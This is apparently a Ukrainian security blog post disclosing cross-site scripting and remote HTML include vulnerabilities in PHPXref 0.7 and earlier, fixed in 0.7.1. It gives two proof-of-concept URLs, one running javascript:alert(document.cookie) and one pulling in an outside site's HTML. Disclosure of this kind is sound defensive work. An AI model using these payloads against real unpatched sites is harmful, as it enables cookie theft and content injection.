Уразливості в PHPXref
17:33 08.02.201127.12.2010
У вересні, 19.09.2010, я знайшов Cross-Site Scripting та Remote HTML Include уразливості в PHPXref. Які я виявив на одному сайті, що використовує даний веб додаток. Про що найближчим часом повідомлю розробникам.
Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам веб додатку.
08.02.2011
XSS (RXI):
http://site/nav.html?javascript:alert(document.cookie)
RHI:
http://site/nav.html?http://websecurity.com.ua
Уразливі PHPXref 0.7 та попередні версії. У версії PHPXref 0.7.1 розробник виправив дані уразливості.